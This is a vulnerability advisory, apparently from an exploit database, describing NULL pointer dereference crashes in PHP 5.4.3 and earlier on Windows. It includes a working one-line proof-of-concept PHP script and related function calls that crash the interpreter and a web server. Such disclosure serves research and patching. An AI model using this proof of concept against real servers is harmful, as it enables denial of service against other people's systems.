Release date:-11 vulnerability version:
PHP 5.4.3
Vulnerability description:
Bugtraq id: 53643PHP is an embedded HTML language. PHP is somewhat similar to Microsoft's ASP, and is a script language for embedding HTML documents on the server, the language style is similar to the C language and is widely used by many website programmers. In versions earlier than PHP 5.4.3, there are multiple DoS vulnerabilities caused by NULL pointer reference. Attackers can exploit these vulnerabilities to cause application crash.
<* Reference
Condis
*> Test method: @ Sebug.net dis
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk!
- <?php
-
- /*
-
- PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce
- Author : condis
- Date : 10.04.2012 AD
- Website : http://cond.psychodela.pl
-
- ----
-
- Download : http://php.net/downloads.php
-
- Tested on:
-
- PHP 5.3.8 + Windows XP SP3 Professional PL
- PHP 5.3.10 + Windows XP SP3 Professional PL
- PHP 5.4.0 + Windows XP SP3 Professional PL
- PHP 5.4.3 + Windows XP SP3 Professional PL
-
- Description:
-
- wddx_serialize_value and wddx_serialize_vars functions fails to handle Variant
- object when it is given as a first argument.
-
- Registers:
-
- EAX 00000000
- ECX 1056AAE8 php5ts.1056AAE8
- EDX 100EFCE0 php5ts.100EFCE0
- EBX 01032AB0
- ESP 00C0FAE0
- EBP 00000000
- ESI 0121E478
- EDI 0121CB50
- EIP 1028F22E php5ts.1028F22E
-
- Crash:
-
- 1028F22E 8A45 25 MOV AL,BYTE PTR SS:[EBP+25]
-
- Situation looks pretty much the same for both wddx_serialize_vars and
- wddx_serialize_value. Also functions stream_bucket_prepend and stream_bucket_append
- have some problems with handling Variant object when given as a second argument:
-
- stream_bucket_append(1, new Variant(1));
- stream_bucket_prepend(1, new Variant(1));
-
- PS : Variant object is only available in PHP for Windows OS and it was implemented
- in PHP > 4.1.0 and PHP 5.
-
- For more details check : http://php.net/manual/en/class.variant.php
-
- PS2: After running this via webserver my Apache wasn't able to handle requests
- anymore and I had to restart him :)
-
- kthxbye
-
- */
-
- wddx_serialize_value(new Variant(666));
-
- ?>
Security suggestions:
Vendor patch: PHP --- the current vendor has not provided a patch or upgrade program, we recommend that you use this software at any time follow the vendor's home page to get the latest version: http://www.php.net